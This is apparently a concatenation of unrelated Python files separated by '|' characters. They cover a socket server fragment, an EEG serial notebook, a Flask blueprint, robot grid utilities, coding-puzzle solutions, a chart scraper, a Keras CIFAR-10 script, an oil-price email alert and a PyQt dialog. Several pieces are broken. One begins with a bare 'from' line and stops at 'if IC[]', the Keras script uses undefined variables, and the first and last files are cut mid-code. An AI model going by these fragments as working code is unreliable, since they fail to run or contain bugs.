ready_to_read, _, _ = select.select(socks, [], [], Consts.TIMEOUT_SELECT_DATA)
for sock in ready_to_read:
connection = self.connections.get(sock)
self._handle_connection(connection)
@staticmethod
def _handle_manage():
while True:
choice = input('enter "exit" to terminate')
if choice == 'exit':
return True
def _handle_connection(self, connection):
if connection.is_closed():
connection.close()
self.connections.remove(connection)
if connection.state == ConnectionState.UNAUTHENTICATED:
data = connection.recv()
msg = data.decode()
self._connection_login(msg=msg, origin=connection)
elif connection.state == ConnectionState.BROADCAST:
data = connection.recv()
msg = data.decode()
# TODO: validate this is a valid json
self._connection_broadcast(msg=msg, origin=connection)
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import struct
import socket
import codecs
import time
import matplotlib.pyplot as plt
import pylab
import random
import numpy as np
import sys
import csv
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import math
import serial
# In[433]:
def ctvepNoise(times):
out = []
ser = serial.Serial('/dev/ttyACM4', 9600, timeout=1)
TP9 = []
TP10 = []
AF7 = []
AF8 = []
ELECT = []
allTot = []
for i in range(times):
for i in range(4):
time.sleep(4)
count = 0
final = []
nu = 1
toolbar_width = 10
sys.stdout.write("[%s]" % ("" * toolbar_width))
sys.stdout.flush()
sys.stdout.write("\b" * (toolbar_width+1))
ff = np.load("/home/lukepiette/Documents/museserver/buffer.npy")
TP9 = plt.psd(ff[0],Fs=256,sides="onesided")[0]
AF7 = plt.psd(ff[1],Fs=256,sides="onesided")[0]
AF8 = plt.psd(ff[2],Fs=256,sides="onesided")[0]
TP10 = plt.psd(ff[3],Fs=256,sides="onesided")[0]
ELECT = plt.psd(ff[4],Fs=256,sides="onesided")[0]
d = 0
d += (sum(TP9[7:13])*sum(TP9[13:19]))
#d += (sum(AF7[7:13])*sum(AF7[13:19]))
#d += (sum(AF8[7:13])*sum(AF8[13:19]))
d += (sum(TP10[7:13])*sum(TP10[13:19]))
d += (sum(ELECT[7:13])*sum(ELECT[13:19]))
d = d/5
allTot += [d]
print(d)
if d > 1000:
ser.write(str.encode('1'))
else:
ser.write(str.encode('0'))
sys.stdout.write("")
sys.stdout.write("\n")
ser.close()
return(allTot)
# In[438]:
score = ctvepNoise(12)
# In[430]:
score
# In[437]:
plt.plot([i for i in range(len(score))],score)
# In[396]:
ff = np.load("/home/lukepiette/Documents/museserver/buffer.npy")
# In[399]:
plt.psd(ff[0],Fs=256,sides="onesided")[0].shape
# In[ ]:
|
#!/usr/bin/env python
'''
Count the number of occurrences in a list
'''
import numpy as np
def count(sequence, item):
total = 0
for i in range(len(sequence)):
if sequence[i] == item:
total += 1
return total
alist = [np.random.randint(0,10) for _ in range(25)]
print(count(alist,alist[2])) |
def get_num_ecgs_with_feature(json_data, binary_feature_name):
"""Смотрим, у скольки пациентов датасета в разделе
докторсокого стуктурированного диагноза (т.е. в "StructuredDiagnosisDoc")
находится True """
counter = 0
for case_id in json_data.keys():
if(json_data[case_id]["StructuredDiagnosisDoc"][binary_feature_name] is True):
counter += 1
return counter
def print_diagnosis_distribution(json_data):
ecgs_ids = json_data.keys()
first_ecg_id = next(iter(ecgs_ids ))
binary_features_list = list(json_data[first_ecg_id]["StructuredDiagnosisDoc"].keys())
feature_num_trues = dict()
for binary_feature_name in binary_features_list:
num_trues = get_num_ecgs_with_feature(json_data, binary_feature_name)
feature_num_trues[binary_feature_name] = num_trues
for w in sorted(feature_num_trues, key=feature_num_trues.get, reverse=True):
print(w, feature_num_trues[w])
if __name__ == "__main__":
from settings import load_json_dset_with_delin
data = load_json_dset_with_delin()
print_diagnosis_distribution(data) |
from flask import Blueprint, render_template, request, session, url_for
from werkzeug.utils import redirect
import src.models.users.decorators as decorators
from src.models.sked.sked import Sked
sked_blueprint = Blueprint('skeds', __name__)
@sked_blueprint.route('/new', methods=['GET','POST'])
@decorators.requires_login
def add_sked():
if request.method == 'POST':
name = request.form['name']
day = request.form['day']
time = request.form['time']
sked = Sked(session['email'], day, time, name)
sked.save()
return render_template('skeds/add_sked.html')
@sked_blueprint.route('/edit/<string:sked_id>', methods=['GET','POST'])
@decorators.requires_login
def edit_sked(sked_id):
sked = Sked.find_by_id(sked_id)
if request.method == "POST":
name = request.form['name']
day = request.form['day']
time = request.form['time']
sked.day = day
sked.time = time
sked.name = name
sked.save()
return redirect(url_for('users.user_sked'))
return render_template('skeds/edit_sked.html', sked=sked)
@sked_blueprint.route('/delete/<string:sked_id>')
@decorators.requires_login
def delete_sked(sked_id):
Sked.find_by_id(sked_id).delete()
return redirect(url_for('users.user_sked'))
|
#!/usr/bin/python
import math
def print_map_to_file(d_grid, filename):
with open(filename, "w+") as grid_file:
for row in reversed(d_grid):
for cell in row:
grid_file.write("1") if cell else grid_file.write("0")
grid_file.write("\n")
def create_occupancy_grid(my_map):
# creating the occupancy grid
grid = [[None] * my_map.info.width for i in xrange(my_map.info.height)]
for i in xrange(my_map.info.height):
for j in xrange(my_map.info.width):
if my_map.data[i * my_map.info.width + j] == 0:
grid[i][j] = False
else:
grid[i][j] = True
return grid
def create_d_size_grid(grid, robot_diameter_pixels, regular_grid_height, regular_grid_width):
# height = num of rows
d_grid_rows = int(math.floor(regular_grid_height / robot_diameter_pixels))
# width = num of columns
d_grid_columns = int(math.floor(regular_grid_width / robot_diameter_pixels))
d_grid = [[None] * d_grid_columns for i in xrange(d_grid_rows)]
# we're going through the regular grid with pixels according to the robot diameter in pixels
row_start = 0
column_start = 0
for i in range(d_grid_rows):
for j in range(d_grid_columns):
r_end = row_start + robot_diameter_pixels
c_end = column_start + robot_diameter_pixels
d_grid[i][j] = int(is_square_occupied(grid, row_start, column_start, r_end, c_end, regular_grid_height,
regular_grid_width))
column_start += robot_diameter_pixels
column_start = 0
row_start += robot_diameter_pixels
return d_grid
def is_square_occupied(grid, row_start, column_start, row_end, column_end, regular_grid_height, regular_grid_width):
if row_end >= regular_grid_height or column_end >= regular_grid_width:
return False
row_traverser = row_start
while row_traverser < row_end:
column_traverser = column_start
while column_traverser < column_end:
if grid[row_traverser][column_traverser] == True:
return True
column_traverser = column_traverser + 1
row_traverser = row_traverser + 1
return False
def create_4D_grid(d_grid):
d4_grid = [[None] * (len(d_grid[0]) / 2) for i in range(len(d_grid) / 2)]
d_i, d_j = 0, 0
for i in range(0, len(d_grid), 2):
for j in range(0, len(d_grid[i]), 2):
# occupied
if d_grid[i][j] == 1 or d_grid[i + 1][j] == 1 or d_grid[i][j + 1] == 1 or d_grid[i + 1][j + 1] == 1:
d4_grid[d_i][d_j] = True
else: # not occupied
d4_grid[d_i][d_j] = False
if d_j < len(d4_grid[0]) - 1:
d_j += 1
else:
break
d_j = 0
if d_i < len(d4_grid) - 1:
d_i += 1
else:
break
return d4_grid
def load_grid_from_file(path):
file = open(path, "r")
grid = []
for line in file:
line_list = []
for char in line:
if char != '\n':
line_list.append(char)
grid.append(line_list)
file.close()
return grid
|
from app import db
from app.authenticate import generate_hash,check_passwd
from app.auxiliar import AutoAttributes
class Cadastro(db.Model,AutoAttributes):
__tablename__ = 'cadastro_usuario'
id_cadastro = db.Column(db.Integer,primary_key = True)
senha = db.Column(db.Text, nullable=False)
usuario_id = db.Column(db.Integer, db.ForeignKey('usuario.id_usuario'),nullable=False,unique=True)
def passwd(self,passwd):
self.senha = generate_hash(passwd)
def check(self,passwd):
return check_passwd(passwd,self.senha)
attrs = ['id_cadastro','usuario_id','senha'] |
#!/usr/bin/env python
# Funtion:
# Filename:
import select, socket, queue
class Slectors_server(object):
def __init__(self, HOST):
self.server = socket.socket()
self.server.bind(HOST)
self.server.listen(1000)
self.server.setblocking(False)
def push(self, Recv_dict):
pass
def pull(self, Recv_dict):
pass
|
# @Title: 从上到下打印二叉树 III (从上到下打印二叉树 III LCOF)
# @Author: 2464512446@qq.com
# @Date: 2020-06-28 17:17:15
# @Runtime: 40 ms
# @Memory: 13.8 MB
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
res = []
helper = [root]
temp = []
next_level = []
count = 0
while helper or next_level:
if not helper:
helper = next_level
next_level = []
node = helper.pop(0)
temp.append(node.val)
if not helper:
if count % 2 == 0:
res.append(temp)
else:
res.append(temp[::-1])
count +=1
temp = []
if node.left:
next_level.append(node.left)
if node.right:
next_level.append(node.right)
return res
|
#
# u n c o m m e n t . p y
#
# javascript comments, both /* ... */ and // to eol
#
import sys, re
prog = list(sys.stdin.read()) + [None,None,None]
x = 0
while prog[x] != None :
#print "top of loop:", x, prog[x]
if prog[x]=='/' and prog[x+1]=='/' :
while prog[x] != '\n' :
if prog[x] == None : break
prog[x] = None
x += 1
elif prog[x]=='/' and prog[x+1]=='*' :
while prog[x] != None :
if prog[x] == '*' and prog[x+1] == '/' :
prog[x] = prog[x+1] = None
x += 2
break
else :
# inside old style comment
prog[x] = None
x += 1
else : x += 1 # Actually in code
prog = filter(lambda x: x != None, prog)
prog = "".join(prog)
prog = re.sub(" *\n","\n",prog) # clip trailing spaces
prog = re.sub("\n\n*","\n",prog) # multi empty lines to single
print prog
|
import requests #requests 라이브러리 가져오기
from bs4 import BeautifulSoup #크롤링을 쉽게 해주는 라이브러리
from pprint import pprint
from pymongo import MongoClient # pymongo를 임포트 하기
client = MongoClient('localhost', 27017) # mongoDB는 27017 포트로 돌아갑니다.
db = client.dbsparta # 'dbsparta'라는 이름의 db를 만듭니다.
# 타겟 url 가져오기
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get('https://www.genie.co.kr/chart/top200?ditc=D&ymd=20200403&hh=23&rtm=N&pg=1',headers=headers)
#변수에 parsing된 데이터 담기
soup = BeautifulSoup(data.text, 'html.parser')
# select를 이용해서, 원하는 것 가져오기
musics = soup.select('#body-content > div.newest-list > div > table > tbody > tr')
# pprint(musics)
# musics (tr들) 의 반복문을 돌리기
for music in musics:
# music 안에 rank 가 있으면,
music_rank = music.select_one('td.number')
music_name = music.select_one('td.info > a')
music_artist = music.select_one('td.info > a.artist.ellipsis')
music_album = music.select_one('td.info > a.albumtitle.ellipsis') #class="albumtitle ellipsis"
rank = music_rank.text.split(" ")[0].strip()
name = music_name.text.strip()
artist = music_artist.text.strip()
album = music_album.text.strip()
print(rank+" "+name+' -'+artist+' "'+album+'"')
# doc = {
# 'rank' : rank,
# 'name' : name,
# 'artist' : artist
# }
# db.musics.insert_one(doc)
# target_artist = db.musics.find_one({"artist":"아이유 (IU)"})
# target_rank = target_artist["rank"]
# iu_musics = list(db.musics.find({'rank':target_rank}))
# pprint(iu_musics) |
import numpy as np
from matplotlib import pyplot
from scipy.misc import toimage
import json
import keras
from keras.datasets import cifar10
from keras.utils import np_utils
from keras.optimizers import SGD
from keras.regularizers import l2, activity_l2
from keras.layers.normalization import BatchNormalization
from keras.models import Sequential
from keras.models import model_from_json
from keras.layers.core import Activation
from keras.layers import Dense
from keras.layers import Dropout
from custom_augmentation import image_alt
#custom csv logger callback
from custom_callbacks.customcalls import CSVHistory
from keras.callbacks import ModelCheckpoint
# ***************\\CHANGE MODEL NAME HERE EVERY RUN//***********************
# **************************************************************************
modelname = "ffn42" #used for logging purposes
# **************************************************************************
seed = 7
np.random.seed(seed)
# load data
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
#normalize images
X_train = X_train.astype("float32")
X_test = X_test.astype("float32")
X_train = X_train / 255.0
X_test = X_test / 255.0
#reshape images to vectors
X_train = np.reshape(X_train, (50000, 3072))
X_test = np.reshape(X_test, (10000, 3072))
# one hot encode outputs
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
num_classes = y_test.shape[1]
train_sub_ind = np.random.choice(X_train.shape[0], 25000, replace = False)
#SUBSET TRAINING SET
#X_train = X_train[train_sub_ind, :]
#y_train = y_train[train_sub_ind, :]
"""
************************LOAD A MODEL FROM JSON*************************
***********************************************************************
with open('./models/ffn19.json', 'rb') as fp:
saved_model = json.load(fp)
model = model_from_json(saved_model)
"""
#define model
model = Sequential()
model.add(Dense(512, input_dim=3072))
#model.add(BatchNormalization())
model.add(Activation("relu"))
#model.add(Dropout(0.02))
model.add(Dense(512))
#model.add(BatchNormalization())
model.add(Activation("relu"))
#model.add(Dropout(0.02))
model.add(Dense(512))
#model.add(BatchNormalization())
model.add(Activation("relu"))
#model.add(Dropout(0.02))
model.add(Dense(10))
#model.add(BatchNormalization())
model.add(Activation("softmax"))
# COMPILE
epochs = 5
lrate = 0.01
decay = lrate/epochs
sgd = SGD(lr=lrate, decay = decay,momentum = 0.9, nesterov=True)
adam = keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
#CALLBACKS
#board = keras.callbacks.TensorBoard(log_dir="logs/" + modelname, histogram_freq=0, write_graph=True, write_images=False)
#csv = CSVHistory("csv_logs/log_ffn_adam.csv", modelname, separator = " , ", append = True)
filepath = modelname + "_" + "{epoch:02d}-{val_acc:.2f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=True, mode='auto')
data_augmentation = True
if not data_augmentation:
print 'Not using data augmentation.'
model.fit(X_train, y_train, validation_data=(X_test, y_test), nb_epoch=epochs, batch_size= batch_size, callbacks = [checkpoint])
else:
print 'Using real-time data augmentation.'
# this will do preprocessing and realtime data augmentation
datagen = image_alt.ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)
width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)
height_shift_range=0.1, # randomly shift images vertically (fraction of total height)
horizontal_flip=True, # randomly flip images
vertical_flip=False) # randomly flip images
datagen.fit(X_train)
model.fit_generator(datagen.flow(X_train, y_train,
batch_size=32),
samples_per_epoch=X_train.shape[0],
nb_epoch=epochs,
validation_data=(X_test, y_test),
callbacks = [board, csv])
#FIT
fit = model.fit(X_train, y_train, validation_data = (X_test, y_test), nb_epoch=epochs, batch_size=32, shuffle = True, callbacks = [checkpoint])
with open("models/" + modelname + ".json", 'wb') as fp:
json.dump(model.to_json(), fp)
model.save_weights("weights/" + modelname + ".hdf5")
|
import requests
requests.packages.urllib3.disable_warnings()
import sys
# from bs4 import BeautifulSoup
from decimal import Decimal
# import json
# import lxml
import threading
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
# 第三方 SMTP 服务
mail_host="smtp.163.com" #设置服务器
mail_user="" #用户名
mail_pass="" #口令
sender=mail_user # 发送邮件
receivers=[''] # 接收邮件
dir = 'b' # b: buy s: sell
buy = 0.00
up = 0.79
down = 0.59
timer = {}
def notify(curr = 0.00):
global buy
buy = float(Decimal(buy).quantize(Decimal('0.00')))
curr = float(Decimal(curr).quantize(Decimal('0.00')))
space = float(Decimal(curr - buy).quantize(Decimal('0.00')))
print('')
curr_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print('\033[7;30;46m----实时USoil: ' + str(curr) + '-----' + 'b:' + str(buy) + '--' + 'space:' + str(space) + '-----', curr_time, '\033[0m')
messageInfo = ''
if (dir == 'b' and curr >= buy + up) or (dir == 's' and curr <= buy - up):
timer.cancel()
print('\033[1;5;31m**买**' + str(buy) + '-' + str(curr),'*****止盈*****\033[0m')
messageInfo= '通知:' + curr_time + ' US oil ' + str(buy) + '-' + str(curr) + ' 已止盈'
if (dir == 'b' and curr <= buy - down) or (dir == 's' and curr >= buy + down):
timer.cancel()
print('\033[1;5;31m**卖**' + str(buy) + '-' + str(curr),'*****止盈*****\033[0m')
messageInfo= '通知:' + curr_time + ' US oil ' + str(buy) + '-' + str(curr) + ' 已止损'
if messageInfo:
title = '【US oil】行权通知'
content = '''
<html>
<head></head>
<body>
<b>%s</b>
</body>
</html>
'''%(messageInfo)
# 三个参数:第一个为文本内容,第二个 plain 设置文本格式,第三个 utf-8 设置编码
message = MIMEText(content, 'html', 'utf-8')
message['From'] = Header(mail_user) # 发送者
message['To'] = Header(receivers[0]) # 接收者
message['Subject'] = Header(title, 'utf-8')
try:
smtpObj = smtplib.SMTP()
smtpObj.connect(mail_host, 25) # 25 为 SMTP 端口号
smtpObj.login(mail_user,mail_pass)
smtpObj.sendmail(sender, receivers, message.as_string())
smtpObj.quit()
print("邮件发送成功")
except smtplib.SMTPException as e:
print("Error: 无法发送邮件", e)
pass
def pickPrice(str = ''):
price = str.split(';')[0]
s = price.find('"')+1
e = price.find(',')
result = price[s:e]
notify(result)
def getUSoilPrice():
global timer
timer = threading.Timer(5, getUSoilPrice)
timer.start()
url = "https://info.usd-cny.com/data/oil.js"
# 模拟浏览器访问
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
}
try:
res = requests.get(url, headers=headers, timeout=10, verify=False)
except requests.exceptions.ProxyError:
print("代理出错,正在重试...")
time.sleep(3)
except requests.exceptions.ConnectTimeout:
print("请求超时, 正在重试...")
time.sleep(3)
except requests.exceptions.ConnectionError as e:
print('---请求异常--- ' + e)
else:
if res.status_code == 200:
res.encoding = 'gbk'
result_str = res.text
pickPrice(result_str)
else:
print('爬取数据失败')
pass
def startTask():
print('------买入价格:'+ buy + ', 任务开启!-------')
getUSoilPrice()
pass
# 程序入口
if __name__ == "__main__":
#买入价格
buy = sys.argv[1]
#方向: b买 s卖
dir = sys.argv[2]
startTask()
|
import tensorflow as tf
import numpy as np
from tensorflow.keras import layers
import matplotlib.pyplot as plt
import time
import TTT
board = TTT.Board(3);
board.place_piece(1, 1, 1);
board.place_piece(1, 0, 1);
board.place_piece(1, 2, 1);
if(1 != board.has_won()):
print("BOARD WIN ERROR 1")
board.remove_piece(1, 1);
if(1 == board.has_won()):
print("BOARD REMOVE WIN ERRROR")
board.place_piece(2, 0, -1);
board.place_piece(1, 1, -1);
board.place_piece(0, 2, -1);
if(-1 != board.has_won()):
print("BOARD REPLACE ERROR");
board.remove_piece(0, 2);
board.place_piece(0, 0, -1);
board.place_piece(0, 2, -1)
if(-1 != board.has_won()):
print("WTF")
board.refresh()
test_play = board.negamax(1);
if(test_play[0] != 0):
print("NEGAMAX VALUE ERROR: " + str(test_play[0]))
board.refresh()
test_play = board.negamax(-1);
if(test_play[0] != 0):
print("NEGAMAX VALUE ERROR: " + str(test_play[0]))
start = time.time()
start_player = 1;
for i in range(0, 1):
board.refresh()
start_player *= -1
current_player = start_player
while(not board.has_won() and not board.drawn()):
best_play = board.negamax(current_player)
board.place_piece(best_play[1][0], best_play[1][1], current_player)
current_player *= -1
if(board.has_won() != 0):
print("NEGAMAX ERROR!")
end = time.time()
print(end - start)
board.refresh()
test_f = open("test_f.dat", 'a')
board.log_to(test_f)
test_move = board.negamax(1);
board.refresh()
board.place_piece(0, 0, 1)
board.place_piece(1, 2, -1)
board.print()
one_hot_ans = board.get_nn_input(-1)
print(one_hot_ans)
|
#!/usr/bin/env python3
# encoding: utf-8
"""
selection_sort.py
Created by Jakub Konka on 2011-11-01.
Copyright (c) 2011 University of Strathclyde. All rights reserved.
"""
import sys
import random as rnd
def selection_sort(array):
'''This function implements the standard version of the
selection sort algorithm.
Keyword arguments:
array -- input array of integers
Return: None (sorted array)
'''
n = len(array)
for i in range(n):
min_el = array[i]
min_ind = i
for j in range(n-i-1):
if min_el > array[i+j+1]:
min_el = array[i+j+1]
min_ind = i+j+1
tmp = array[i]
array[i] = min_el
array[min_ind] = tmp
if __name__ == '__main__':
n = int(sys.argv[1])
array = [rnd.randint(1,100) for i in range(n)]
# print("Array before sorting: ", array)
selection_sort(array)
# print("Array after sorting: ", array)
|
def sum(num):
sum = 0
i = 0
while i <= num:
sum = sum + i
i = i + 1
print(sum)
sum(4)
|
if __name__ == "__main__":
n = int(input())
for i in range(n):
word = list(input())
guess = list(input())
M = ["G" if w == b else "B" for w, b in zip(word, guess)]
print("".join(M))
|
'''
Extraire le dosage
La forme galenique
Le volume (nb de gelules)
Calculer l'equivalent traitement
'''
import pandas as pd
import requests
import re
url = "https://www.open-medicaments.fr/api/v1/medicaments?limit=100&query=paracetamol"
jsonData = requests.get(url).json()
#ICS = [f'https://www.open-medicaments.fr/api/v1/medicaments/{elm["codeCIS"]}' for elm in jsonData]
# Ne fonctionne pas dans pycharm ?
# Version boucle FOR
ICS = []
for i in range(0,len(jsonData)):
toAppend = 'https://www.open-medicaments.fr/api/v1/medicaments/'+jsonData[i]['codeCIS']
ICS.append(toAppend)
print("Liste des liens API :")
print(ICS)
#s = [requests.get(url).json() for url in ICS]
fiches_completes = []
for url in ICS:
fiches_completes.append(requests.get(url).json())
print("Request pour chaque JSON complet :")
print(fiches_completes)
reg1 = r'(\d+)'
libelles = [medoc["presentations"][0]["libelle"] for medoc in fiches_completes]
gelules = pd.DataFrame({"gelules":[re.findall(reg1,lib)[-1] for lib in libelles]})
print(gelules.head())
df = pd.DataFrame(jsonData)
# On travaille uniquement sur la colonne Denomination
# Nouveau DF à partir des elements de la regex
reg = r'([\D]*)(\d+)(.*),(.*)'
serie = df["denomination"]
ds = serie.str.extract(reg)
# Colonnes de multiplicateur pour g/mg et dosage
ds["mul"] = 1000
ds["mul"] = ds["mul"].where(ds[2].str.strip()=="g",1)
ds["dosage"] = ds[1].fillna(0).astype(int)*ds["mul"]
ds["nb_gelules"] = gelules
print(ds.head()) |
"""
一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。
机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。
现在考虑网格中有障碍物。那么从左上角到右下角将会有多少条不同的路径?
网格中的障碍物和空位置分别用 1 和 0 来表示。
示例 1:
输入:obstacleGrid = [[0,0,0],[0,1,0],[0,0,0]]
输出:2
解释:
3x3 网格的正中间有一个障碍物。
从左上角到右下角一共有 2 条不同的路径:
1. 向右 -> 向右 -> 向下 -> 向下
2. 向下 -> 向下 -> 向右 -> 向右
示例 2:
输入:obstacleGrid = [[0,1],[0,0]]
输出:1
提示:
m == obstacleGrid.length
n == obstacleGrid[i].length
1 <= m, n <= 100
obstacleGrid[i][j] 为 0 或 1
Related Topics 数组 动态规划
👍 551 👎 0
"""
def unique_paths_with_obstacles(grid):
height, width = len(grid), len(grid[0])
store = [[0] * width for _ in range(height)]
# 从上到下,从左到右
# 每一行
for m in range(height):
# 每一列
for n in range(width):
# 如果这一格有障碍物
if not grid[m][n]:
if m == n == 0:
store[m][n] = 1
else:
a = store[m-1][n] if m != 0 else 0 # 上方格子
b = store[m][n-1] if n != 0 else 0 # 左方格子
store[m][n] = a + b
print(store[-1][-1])
return store[-1][-1]
unique_paths_with_obstacles([[0,0,0],[0,1,0],[0,0,0]]) |
from
Q = 10**9+7
N, M = map( int, input().split())
A = list( map( int, input().split()))
B = list( map( int, input().split()))
G = [(0,0)]*N
R = [(0,0)]*M
for i, m in enumerate(A):
G[i] = (m,i)
for j, m in enumerate(B):
R[j] = (m,j)
G.sort()
R.sort()
ans = 1
A.sort()
B.sort()
for i in range(N):
if A[i] < M*i:
ans = 0
break
for j in range(M):
if B[j] < N*j:
ans = 0
break
IC = [0]*N
JC = [0]*N
cnt = 0
for m in range(M*N,-1,-1):
g, i = G[0]
r, j = R[0]
if m == g and m == r:
G.pop(0)
R.pop(0)
IC[i] = 1
JC[i] = 1
elif m == g:
if IC[]
|
from PyQt4 import QtGui
from TimePad import Ui_Dialog
import ShiftPopUp
class TimePadPopUp(QtGui.QDialog):
a = float() # Total hours counter variable
#sender = str()
def __init__(self, StAM, FinAM, BrkAM, StPM, FinPM, BrkPM):
super(TimePadPopUp, self).__init__()
QtGui.QWidget.__init__(self)
self.uip = Ui_Dialog()
self.uip.setupUi(self)
self.StAM = StAM
self.FinAM = FinAM
self.BrkAM = BrkAM
self.StPM = StPM
self.FinPM = FinPM
self.BrkPM = BrkPM
# 0 the total hours counter variable 'a'
TimePadPopUp.a = + 0
# Connect all buttons to modules
self.uip.pushButton1.clicked.connect(self.Button1)
self.uip.pushButton2.clicked.connect(self.Button2)
self.uip.pushButton3.clicked.connect(self.Button3)
self.uip.pushButton4.clicked.connect(self.Button4)
self.uip.pushButton5.clicked.connect(self.Button5)
self.uip.pushButton6.clicked.connect(self.Button6)
self.uip.pushButton7.clicked.connect(self.Button7)
self.uip.pushButton8.clicked.connect(self.Button8)
self.uip.pushButton9.clicked.connect(self.Button9)
self.uip.pushButton10.clicked.connect(self.Button10)
self.uip.pushButton11.clicked.connect(self.Button11)
self.uip.pushButton12.clicked.connect(self.Button12)
self.uip.pushButton13.clicked.connect(self.Button13)
self.uip.pushButton14.clicked.connect(self.Button14)
self.uip.pushButton15.clicked.connect(self.Button15)
self.uip.pushButton16.clicked.connect(self.Button16)
self.uip.pushButton17.clicked.connect(self.Button17)
self.uip.pushButton18.clicked.connect(self.Button18)
self.uip.pushButton19.clicked.connect(self.Button19)
self.uip.pushButton20.clicked.connect(self.Button20)
self.uip.pushButton21.clicked.connect(self.Button21)
self.uip.pushButton22.clicked.connect(self.Button22)
self.uip.pushButton23.clicked.connect(self.Button23)
self.uip.pushButton24.clicked.connect(self.Button24)
self.uip.pushButton25.clicked.connect(self.Button25)
self.uip.pushButton26.clicked.connect(self.Button26)
self.uip.pushButton0000.clicked.connect(self.Button0000)
self.uip.pushButton0015.clicked.connect(self.Button0015)
self.uip.pushButton0030.clicked.connect(self.Button0030)
self.uip.pushButton0045.clicked.connect(self.Button0045)
self.uip.pushButtonCLR.clicked.connect(self.ButtonCLR)
def ButtonCLR(self):
self.sender = ShiftPopUp.ShiftPopUp.senderBUT
# Use the passed button sender information from ShiftPopUp.TimePadPopUp to assign date to relevant variable
if str(self.sender[0:-3]) == "StAM":
self.StAM = 0
elif str(self.sender[0:-3]) == "FinAM":
self.FinAM = 0
elif str(self.sender[0:-3]) == "BrkAM":
self.BrkAM = 0
elif str(self.sender[0:-3]) == "StPM":
self.StPM = 0
elif str(self.sender[0:-3]) == "FinPM":
self.FinPM = 0
elif str(self.sender[0:-3]) == "BrkPM":
self.BrkPM = 0
def Button1(self):
if self.uip.pushButton1.isChecked() is True: # If button is checked increase counter by 1
TimePadPopUp.a = TimePadPopUp.a + 1
elif self.uip.pushButton1.isChecked() is False: # If button is unchecked decrease counter by 1
TimePadPopUp.a = TimePadPopUp.a - 1
print(TimePadPopUp.a)
def Button2(self):
if self.uip.pushButton2.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 2
elif self.uip.pushButton2.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 2
print(TimePadPopUp.a)
def Button3(self):
if self.uip.pushButton3.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 3
elif self.uip.pushButton3.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 3
print(TimePadPopUp.a)
def Button4(self):
if self.uip.pushButton4.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 4
elif self.uip.pushButton4.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 4
print(TimePadPopUp.a)
def Button5(self):
if self.uip.pushButton5.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 5
elif self.uip.pushButton5.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 5
print(TimePadPopUp.a)
def Button6(self):
if self.uip.pushButton6.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 6
elif self.uip.pushButton6.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 6
print(TimePadPopUp.a)
def Button7(self):
if self.uip.pushButton7.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 7
elif self.uip.pushButton7.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 7
print(TimePadPopUp.a)
def Button8(self):
if self.uip.pushButton8.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 8
elif self.uip.pushButton8.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 8
print(TimePadPopUp.a)
def Button9(self):
if self.uip.pushButton9.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 9
elif self.uip.pushButton9.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 9
print(TimePadPopUp.a)
def Button10(self):
if self.uip.pushButton10.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 10
elif self.uip.pushButton10.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 10
print(TimePadPopUp.a)
def Button11(self):
if self.uip.pushButton11.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 11
elif self.uip.pushButton11.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 11
print(TimePadPopUp.a)
def Button12(self):
if self.uip.pushButton12.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 12
elif self.uip.pushButton12.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 12
print(TimePadPopUp.a)
def Button13(self):
if self.uip.pushButton13.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 13
elif self.uip.pushButton13.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 13
print(TimePadPopUp.a)
def Button14(self):
if self.uip.pushButton14.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 14
elif self.uip.pushButton14.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 14
print(TimePadPopUp.a)
def Button15(self):
